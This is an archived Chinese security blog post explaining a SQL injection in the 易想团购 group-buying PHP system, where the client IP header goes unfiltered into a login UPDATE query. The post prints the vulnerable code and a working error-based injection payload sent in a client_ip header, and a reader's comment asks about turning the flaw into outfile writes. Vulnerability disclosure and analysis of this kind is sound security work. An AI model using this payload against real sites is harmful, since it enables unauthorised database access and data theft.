CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

易想团购

2017年5月23日 931点热度 0人点赞 0条评论
  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

易想团购系统通杀SQL注入漏洞分析及利用

Seay2013-04-10共88017人围观 ,发现 1 个不明物体WEB安全

刚打开红黑看到基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。

找到get_client_ip()函数:

// 获取客户端IP地址
function get_client_ip(){
   if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
       $ip = getenv("HTTP_CLIENT_IP");
   else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
       $ip = getenv("HTTP_X_FORWARDED_FOR");
   else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
       $ip = getenv("REMOTE_ADDR");
   else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
       $ip = $_SERVER['REMOTE_ADDR'];
   else
       $ip = "unknown";
   return($ip);
}

果然没过滤,看了下很多地方用到这个函数。

比如:

if($_REQUEST['act'] == 'verify')
{
	$id = intval($_REQUEST['id']);
	$user_info  = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."user where id = ".$id);
	if(!$user_info)
	{
		showErr($GLOBALS['lang']['NO_THIS_USER']);
	}
	$verify = $_REQUEST['code'];
	if($user_info['verify'] == $verify)
	{
		//成功
		$_SESSION['user_info'] = $user_info;
		$GLOBALS['db']->query("update ".DB_PREFIX."user set login_ip = '".get_client_ip()."',login_time= ".get_gmtime().",verify = '',is_effect = 1 where id =".$user_info['id']);
		$GLOBALS['db']->query("update ".DB_PREFIX."mail_list set is_effect = 1 where mail_address ='".$user_info['email']."'");	
		$GLOBALS['db']->query("update ".DB_PREFIX."mobile_list set is_effect = 1 where mobile ='".$user_info['mobile']."'");								
		showSuccess($GLOBALS['lang']['VERIFY_SUCCESS'],0,APP_ROOT."/");
}

团购系统嘛,其实不用看代码,登陆的这些地方必定会用这个函数。

果断的,登陆的时候在http头里面加了个client_ip,值为127′

看图:

报错注入,很简单吧,

exp:

火狐插件增加client_ip头部,对应值为

‘ and (select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b)#

这套程序用的thinkphp的框架,回头看看有没有代码执行。

感谢Seay投递

Seay

Seay14 篇文章等级: 4级
|
|
  • 上一篇:短信炸弹—用Python模拟ajax请求
  • 下一篇:[APT专题]中国黑客利用Twitter进行APT攻击
发表评论

已有 1 条评论

  • administrator 2013-04-10回复1楼

    update注射有办法 outfile么?

    亮了(1)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

Seay

Seay

安全宝安全工程师

14 篇文章17 条评论

相关阅读

  • WPS 2012/2013 RTF fchars 堆溢出漏洞分析
  • 阿里巴巴移动安全分析报告:97%的APP存在安全漏洞
  • [精华收集]php漏洞挖掘书籍pdf
  • Oracle out-of-band release for Java SE Vulnerability漏洞分析(CVE-2016-0636)
  • BWAPP:一款非常好用的漏洞演示平台

特别推荐

关注我们 分享每日精选文章

不容错过

  • 走近科学:”种子“的前世今生追影人2016-06-16
  • 国产“骄傲”:最先进的国产IOS木马Xsser现身分析xia0k2014-10-15
  • 【快讯】俄罗斯最大社交网站VK.com被黑,1.71亿用户账号仅售1比特币米雪儿2016-06-06
  • 专访知名黑客陆羽:俯瞰陆地、振羽翱翔T00ls安全2015-12-04

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月23日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me